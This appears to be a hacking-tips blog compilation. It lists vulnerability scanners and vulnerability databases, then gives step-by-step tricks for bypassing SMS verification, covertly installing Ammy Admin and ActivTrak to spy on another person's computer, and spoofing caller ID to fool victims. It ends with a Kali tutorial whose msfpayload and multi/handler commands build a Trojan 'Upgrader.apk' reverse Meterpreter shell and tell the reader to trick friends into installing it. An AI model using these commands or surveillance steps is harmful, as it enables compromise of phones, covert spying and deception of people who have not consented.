Vulnerability Scanners Simply Explained

What Is Vulnerability Scanners ?

According to wikipedia, “A vulnerability scanner is a computer program designed to assess computers, computer systems, networks or applications for weaknesses.

As always, according to me, “Vulnerability scanner is program which is designed to identify the mistakes of a system.”

How Vulnerability Scanner Works ?

The vulnerability scanner works in the same way the antivirus programs does. These scanners, first gather the basic information about the host(target), such as operating system and it’s version, ports and services and then select appropriate test modules.

These vulnerability scanners having a huge database of vulnerabilities and these should be continuously updated.Scheduled scans with these continuously updating scanners can maintain a good security health in the network or system.

Vulnerability scanners not only traces the vulnerabilities but also it fixes and sometimes suggests fix for vulnerability.

What Are The Top Vulnerability Scanners ?

• IBM AppScan
• Netsparker
• Nessus
• OpenVAS
• Retina CS Community
• CORE Impact Pro
• Nexpose

What Are The Best Online Vulnerability Scanners ?

• GamaSec
• Acunetix
• Websecurify
• Qualys

5 Vulnerability Scanners

1. OWASP ZAP – Zed Attack Project

 

 

The Zed Attack Proxy Is an easy to use Integrated penetration testing tool for finding vulnerabilities in web applications.It is officially designed for security experts and also for developers and functional testers who are a newbie in penetration testing.ZAP can trace out vulnerabilities automatically and manually.

So Download ZAP now.

For windows :ZAP For Windows

For Linux.     :ZAP For Linux

For Mac        :ZAP For Mac

2. Burp Suite

 

Burp Suite is a collection of tools for web application security testing. It includes a scanner tool for discovering vulnerabilities automatically. It also supports semi automated penetration testing.The burp suite helps to work more faster and effective.

Download Burp Suite

3. OWASP Xenotix XSS Exploit Framework 

 

 

 

OWASP Xenotix XSS Exploit Framework is an advanced Cross Site Scripting vulnerability detection and exploitation framework.It provides Zero False Positive scan results with its unique Triple Browser Engine (Trident, WebKit, and Gecko) embedded scanner.

It is claimed to have the world’s 2nd largest XSS Payloads of about 1600+ distinctive XSS Payloads for effective XSS vulnerability detection and WAF Bypass. Xenotix Scripting Engine allows you to create custom test cases and addons over the Xenotix API. It is incorporated with a feature rich Information Gathering module for target Reconnaissance.

The Exploit Framework includes offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.

Download OWASP Xenotix

4. Nessus

 

 

Nessus is a free to use open source powerful vulnerability scanner.Unlike other scanners, the plugins( vulnerability definitions) are also free.It provides lot’s of features like,

• Client/server can be anywhere on the network.
• Client/server uses SSL to protect scan results.And lot’s more !

5. Retina Core Impact

 

Retina Community gives you powerful vulnerability management across your entire environment.

For up to 256 IPs free, Retina Community identifies network vulnerabilities(including zero-day), configuration issues, and missing patches across operating systems, applications, devices, and virtual environments.

Download Retina Core Impact

3 Websites For Vulnerability Research

After doing some research, we have created a small list of websites that will help you to perform vulnerability research. Here it is,

1. Security Tracker

 

Security Tracker provides daily updating huge database to the users. It is really simple to use and effective. Anyone can search the site for latest vulnerability information listed under various categories. Best tool for security researchers.

2. Hackerstorm

 

Hackerstorm provides a vulnerability database tool, which allows users to get almost all the information about a particular vulnerability. Hackerstorm provides daily updates for free but source is available for those who wish to contribute and enhance the tool. Such huge data is provided by http://www.osvdb.org and its contributors.

3. Hackerwatch

 

Hackerwatch is not a vulnerability database, but it is a useful tool for every security researcher. It is mainly an online community where internet users can report and share information to block and identify security threats and unwanted traffic.

Xprivacy – A Must Have App For Hackers

Do you care about your privacy more than anything? This app is just for you then. Introducing Xprivacy…. A simple android application (module) that allows you to change the app permissions

Xprivacy is actually an xposed module developed by M. Bokhorst (M66B) to prevent leaking of your private data. It can restrict the categories of data an application can access. For example, the famous game Angry Birds acquires phone numbers for no reason, you can block AngryBirds from accessing the phone numbers by feeding it with no or fake data using Xprivacy.

DID YOU KNOW 

75% of apps that you installed on your phone or tablet are accessing your private data without your knowledge (for no reason).

Why you should care about your privacy ? Honestly, I don’t want to talk the boring stuff. I just want to say “If you are vulnerable or careless about your privacy, you will become a target for hackers”. Just remember the incidents happened last year, snapchat hack, celebrity hacks (Fappening) and more. If you don’t want to be a victim of a hack, you know what to do — care about your privacy.

Ready to use XPrivacy? Then, here are the things you must have, to install XPrivacy.

REQUIREMENTS:

• Your device must have proper root access.
• XPosed Installer (Updated Framework).
• SuperSU/superuser/Busybox.
• Android 4.0.3 or later

If your device have proper root access, download Xposed Installer and then install it in your device. Then open Xposed installer, tap on “Framework“.

It will show a pop up box saying “In some cases, your device might no longer boot after installing Xposed. If you never heard about ‘soft brick’ and ‘boot loop’ before or if you don’t know how to recover from such a situation, do not install Xposed. In any case, having a recent backup is highly recommended.”

Tap on “OK“. Then tap on “Install/ Update“.

Now, a pop up box will display (super user request). Just tap on” Grant“.

After the update,  It will show a message like this:

Tap on  “OK“.

After rebooting your device, open Xposed Installer… Then tap on “Download“.

Search for “XPrivacy” and then tap on it. Then select the “versions” tab and tap on “Download“

After the download, it automatically opens Xprivacy Install page. Tap on “Install“. Then tap on “Done“.

Then go to the Xposed Installer again and tap on “Modules“. Enable Xprivacy and then restart your device.

For Kitkat and Lollipop users, after installing the Xprivacy, the device will display a notification -“Xposed Module is not activated. Activate & Reboot“. Just tap on “Activate & Reboot“.

Now the Xprivacy is ready to use.

HOW TO USE XPRIVACY

Step 1: Find the application to restrict in the main application list.

Step 2: Tap on the application icon or name.

Step 3: Tap the first check box of any category you want to restrict. The second checkbox allows you to restrict category or function on demand. That is, the restrictions will be asked.

If you have any doubts using it, refer this:

If you are a non-rooted device, you can get the app called “UU AppPurifier” to block applications from accessing your private data.

Download UU AppPurifier [Official Download]

How To Bypass SMS Verification Of Any Website/Service

If you don’t want to give your phone number to a website while creating an account, DON’T GIVE IT TO THEM, because today I’m going to show you a trick that you can use to bypass SMS verification of any website/service.

Bypassing SMS Verification:

• Using Recieve-SMS-Online.info

Recieve SMS Online is a free service that allows anyone to receive SMS messages online. It has a fine list of disposable numbers from India, Romania, Germany, USA, United Kingdom, Netherlands, Italy, Spain and France.

Here is how to use Recieve SMS Online to bypass SMS verification:

1. Go to www.receive-sms-online.info:

2. Select any phone number from the website, then enter the number as your mobile number on the “Phone number” box:

3. Send the verification code…. ( If that number is not working, skip to the next one)

4. Click on the selected number on the website.  You will be directed to the inbox:

5. You can find the verification code in the disposable inbox. Enter the code in the verification code field, then click verify code.

6. The account should now be verified.

There are many free SMS receive services available online. Some of them are given below:

• http://receivesmsonline.in

• http://hs3x.com

• http://sms-receive.net

• http://www.receive-sms-now.com

• http://www.receivesmsonline.net

• http://receive-sms-online.com

• http://receive-sms.com

• http://receivesmsonline.com

• http://receivefreesms.net

How To Monitor a Remote Computer For Free

Do you want to monitor a remote computer for free? If the answer is yes,….. YOU CAN DO IT! This article is full of tricks and tips that you can use to monitor a remote computer for FREE.

1. Monitor a Computer Remotely with Ammy Admin

 

Ammy admin is a popular software used for remote system administration and educational purposes. You can easily turn this innocent looking software into a spy that allows you to see what’s going on at a remote PC.

Here is how to do it:

1. Download Ammy Admin. 

[If the link is not working, use this MediaFire link: Download Ammy Admin]

2. Run the program on the computer you want to monitor. A window will appear:

3. Remember or write down the ID of the PC which is shown in the green field “Your ID”. Then go to Ammy > Settings. Another window will popup:

4. Uncheck all the checkboxes except the first one (see the above image). Then click on “Access Permissions” button. (If you want to test the video performance, use the “Video system speed test” button). Another window will popup:

5. Uncheck “Protect these settings from remote computer” and then click on the plus button. A small window will appear:

6. Enter a password and then confirm the password. Click on the “OK” button. Then click “OK” again to save the access permissions.

7. In the main menu, go to Ammy > Service > Install. Ammy Admin will display a message like this:

8. Go to Ammy  > Service > Start. Then close the application. Ammy admin will will automatically run in hidden mode when Windows starts up.

9. Run Ammy Admin on the the computer from which you want to monitor the remote PC.

10. Enter the ID of the child computer on the “client ID/IP” field. Then check “View only” box and click on the “Connect” button.

11. Ammy admin will display a password box:

12. Enter the password that you set up while configuring remote PC and then click on “OK” button.

13. Wait for some time, it will establish a connection to the remote PC and display the live screen:

If you want to listen what’s going on at remote PC, click “voice chat” button on the control panel of remote desktop window.

You can also access files in the remote PC by using the “File Manager” button.

You can also turn your PC into a wireless remote control of the distant computer by unchecking the “View only” option.

Let’s move onto the technique #2

 

2.  Monitor a Computer Remotely with ActivTrak

ActivTrack is a cloud based monitoring service that you can use to spy on children, employees or spouse. The company also offers paid plans, but here we are using a free account!

Let’s start!

1. Go to activtrak.com. You will see a page like the below one:

2. Enter your email address and then click on “Free Secure Signup”. Wait for some seconds, you will see a pop up box like this:

3. Enter your name, password, and organization name,  and click on “OK”. Then download the ActivTrak Agent (click on the “Download ActivTrak Agent” button).

4. After downloading the ActivTrak Agent.msi, install it on the remote computers you want to monitor.

5. Done! go to your computer and then visit https://app.activtrak.com/Account/login. Login with your email and password.

You will see the real time activities of the remote computer:

You can also use this free account as a remote control for your distant PC, but with less features compared to Ammy Admin.

Problems with the free account are, limited screenshots, “only 3 agents”, “only for one user” and 3GB limited storage. But if you are ready to pay for the service, you can get features like unlimited screenshots, unlimited users, unlimited storage, remote installer, support by phone, data export and ad free experience.

So, if you are going to upgrade your account or create a premium account, click on the below banner (It will help us to pay our bills):

If you have a suspicion that you are being monitored, check all the processes in the task manager and then use Detekt to scan your computer.

Also use an on-screen keyboard to enter usernames and passwords.

How To Spoof Caller ID

Quick guide to learn how to spoof caller ID:

Do you want to call your friend as someone else? If yes, you are at the right place.

Before going into the how to guide, let’s take a look at some of the reasons to spoof caller ID:

• Prank calls.
• Impress your friends by calling from unique numbers like 000-000-0000 or 123-456-7890.
• Hide your real phone number.
• Call someone from a number that you want them to call back.

Note: Most of the services described in this article are banned in India and some other countries, so….if you experience any trouble while accessing the services, use a proxy website.

 

Proxy website: www.proxysite.com

Let’s start caller ID spoofing!

• Using Crazy Call:

First, go to www.crazycall.net, and then select your country from the drop down menu.

Then enter the number you want to appear on the victim’s phone when he/she receives the call. Also fill the second box with the number of the person (victim) you want to fool.

If you want to change your voice, you can change it to low pitch or high picth.

Then click on the ” GET ME A CODE” button.

The page will reload and display a unique code and phone numbers:

Make a call from your phone to one of those numbers and enter the code when asked.

As soon as you enter the correct code, CrazyCall will connect your call to the victim with the CallerID and voice you have selected.

There are many free (trial) caller id spoofing services available, some of them are given below:

• Spoof Card:

SpoofCard is a very good service that allows users to call from any number. It also has some interesting features such as voice changer, sound mixer, call recorder and group spoof. You can try a live demo for free. If you want more minutes, you have to buy the credits.

• Bluff My Call:

BluffMyCall spoofing service offers new features such as “Straight To Voice Mail” and “Call Notes” along with the features offered by SpoofCard.

• Caller ID Faker:

Caller ID Faker is just like a normal spoofing service. It doesn’t have any new features. You can try the service for free, unlimited usage available for $29.95.

• SpoofTel:

SpoofTel is a nice service with SMS spoofing feature. You can try the service for FREE, but if you want more minutes, you have to buy the credits.

Here are some apps to spoof caller ID using an Android device:

If you are using an android phone, you can use caller ID spoofing apps like Caller Id Changer, Spoof Card – Anonymous Calling and CallerIDFaker.

Here is an app to spoof caller ID on iPhone (Free iPhone App):

If you are using an iOS device, you can use the SpoofCard iOS app to spoof your phone number.

How To Remotely Hack Android using Kali Linux

This is a tutorial explaining how to hack android phones with Kali.
I can’t see any tutorials explaining this Hack/Exploit, so, I made one.
(Still ,you may already know about this)

Step 1: Fire-Up Kali:

• Open a terminal, and make a Trojan .apk
• You can do this by typing :
• msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP)
• You can also hack android on WAN i.e. through Interet by using yourPublic/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section)

Step 2: Open Another Terminal:

• Open another terminal until the file is being produced.
• Load metasploit console, by typing : msfconsole

Step 3: Set-Up a Listener:

• After it loads(it will take time), load the multi-handler exploit by typing :use exploit/multi/handler

• Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp
• To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external)

Step 4: Exploit!

• At last type: exploit to start the listener.
• Copy the application that you made (Upgrader.apk) from the root folder, to you android phone.

• Then send it using Uploading it to Dropbox or any sharing website (like:www.speedyshare.com).
• Then send the link that the Website gave you to your friends and exploit their phones (Only on LAN, but if you used the WAN method then you can use the exploit anywhere on the INTERNET)

• Let the Victim install the Upgrader app(as he would think it is meant to upgrade some features on his phone)
• However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.
• And when he clicks Open…

Step 5: BOOM!

There comes the meterpreter prompt:

–

See Meterpreter commands here:
http://www.offensive-security.com/metasploit-unleashed/Meterpreter_Basics